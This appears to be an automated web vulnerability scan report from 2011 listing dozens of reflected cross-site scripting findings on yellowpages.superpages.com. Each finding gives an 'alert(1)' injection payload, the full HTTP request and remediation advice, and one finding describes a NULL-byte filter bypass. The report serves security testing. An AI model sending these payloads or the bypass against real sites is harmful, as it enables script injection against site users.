GET /common/jsbb37a"-alert(1)-"32622685d4e/s_code.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b38e5"-alert(1)-"7e6c3fe42b7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/s_code.jsb38e5"-alert(1)-"7e6c3fe42b7 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 77bf9"-alert(1)-"8dab2c2c71d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common77bf9"-alert(1)-"8dab2c2c71d/js/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f6a0"-alert(1)-"aaabf2e973b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js1f6a0"-alert(1)-"aaabf2e973b/sendtom.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eabbc"-alert(1)-"b304378f63d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/sendtom.jseabbc"-alert(1)-"b304378f63d HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4461d"-alert(1)-"6930c85dd26 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common4461d"-alert(1)-"6930c85dd26/js/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 91df3"-alert(1)-"e8a95c1c0a9 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js91df3"-alert(1)-"e8a95c1c0a9/spflyouts.1.0.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2cc0a"-alert(1)-"689c16f939c was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/spflyouts.1.0.js2cc0a"-alert(1)-"689c16f939c HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 98ab9"-alert(1)-"d45a7fa5aaf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common98ab9"-alert(1)-"d45a7fa5aaf/js/swfobject.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload df462"-alert(1)-"539d2934731 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdf462"-alert(1)-"539d2934731/swfobject.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8519c"-alert(1)-"64c92015151 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/swfobject.js8519c"-alert(1)-"64c92015151 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 633b9"-alert(1)-"357d38575b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common633b9"-alert(1)-"357d38575b/js/widget.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd66"-alert(1)-"3845f6ea7bb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdfd66"-alert(1)-"3845f6ea7bb/widget.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bcb24"-alert(1)-"a6a108b5958 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/widget.jsbcb24"-alert(1)-"a6a108b5958 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1f8b6"-alert(1)-"067297a1807 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common1f8b6"-alert(1)-"067297a1807/shared.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d77a"-alert(1)-"d7d525d2174 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/shared.js5d77a"-alert(1)-"d7d525d2174 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of the C request parameter is copied into the HTML document as plain text between tags. The payload %00e5acd<script>alert(1)</script>93fce6bf183 was submitted in the C parameter. This input was echoed as e5acd<script>alert(1)</script>93fce6bf183 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /listings.jsp?C=florists%00e5acd<script>alert(1)</script>93fce6bf183 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 500 Internal Server Error Server: Unspecified Set-Cookie: JSESSIONID=C5E4B03A766E89FAC74949B1AE645437; Path=/ Content-Type: text/html;charset=ISO-8859-1 Date: Thu, 03 Feb 2011 17:10:53 GMT Connection: close
The value of the C request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b00f4"%3balert(1)//9ea80311ee5 was submitted in the C parameter. This input was echoed as b00f4";alert(1)//9ea80311ee5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp?C=floristsb00f4"%3balert(1)//9ea80311ee5 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=8C1509CAA35A56F034FAD97133ED8997; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=C:floristsb00f4%22%3Balert%281%29%2F%2F9ea80311ee5$; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 57369 Date: Thu, 03 Feb 2011 17:10:47 GMT Connection: close
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 277d5"-alert(1)-"5f0b41eeee6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp277d5"-alert(1)-"5f0b41eeee6 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/listings.jsp277d5"-alert(1)-"5f0b41eeee6?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
4.641. http://yellowpages.superpages.com/listings.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://yellowpages.superpages.com
Path:
/listings.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb2e"-alert(1)-"eb20ccb0e37 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=D605CA0AE799843045E67761B4B8FFA3; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56970 Date: Thu, 03 Feb 2011 17:10:04 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... ges.com'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/listings.jsp?6eb2e"-alert(1)-"eb20ccb0e37=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 443ae"-alert(1)-"9a43d5cbd11 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch443ae"-alert(1)-"9a43d5cbd11/mapsearch.jsp HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd6e6"-alert(1)-"4f9032749d1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /mapbasedsearch/mapsearch.jspdd6e6"-alert(1)-"4f9032749d1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
The value of the LID%3D request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d5f6c"-alert(1)-"89fbe9b4764 was submitted in the LID%3D parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=56C7E4A7E9BE4417CC27D724944372C2; Path=/ Set-Cookie: web=; Domain=.superpages.com; Path=/ Set-Cookie: shopping=; Domain=.superpages.com; Path=/ Set-Cookie: yp=; Domain=.superpages.com; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 56887 Date: Thu, 03 Feb 2011 17:10:00 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <script language="JavaScript" type="text/javascript"> document.cookie="OpenPhones="; </script> <h ...[SNIP]... om'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profile.jsp?LID%3Dd5f6c"-alert(1)-"89fbe9b4764="; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c50ad"-alert(1)-"eb234e6d437 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jspc50ad"-alert(1)-"eb234e6d437 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
...[SNIP]... 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/profile.jspc50ad"-alert(1)-"eb234e6d437?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
//--> ...[SNIP]...
4.646. http://yellowpages.superpages.com/profile.jsp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://yellowpages.superpages.com
Path:
/profile.jsp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 63e22"-alert(1)-"f9f6563e460 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /profile.jsp?63e22"-alert(1)-"f9f6563e460=1 HTTP/1.1 Host: yellowpages.superpages.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SPC=1296748823650-www.superpages.com-30323935-794472;
Response
HTTP/1.1 200 OK Server: Unspecified P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Set-Cookie: JSESSIONID=0FD2B8CB4B419165CE2C372B67FFF46C; Path=/ Content-Type: text/html;charset=ISO-8859-1 Content-Language: en-US Content-Length: 32667 Date: Thu, 03 Feb 2011 17:10:08 GMT Connection: close
<!-- --> <html lang="en" xml:lang="en" xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml" xmlns:og="http://opengraphprotocol.org/schema/"> <head> <title> Superpages.com ...[SNIP]... ages.com'; var var_account = 'Superpagescom'; var hostServ = 'http://yellowpages.superpages.com'; var searchtype="two"; searchtype="one"; var actualUrl = "http://yellowpages.superpages.com/profile.jsp?63e22"-alert(1)-"f9f6563e460=1"; var client_id = "133515049997773"; var redirecturl = 'http://yellowpages.superpages.com/Facebook'; //--> ...[SNIP]...
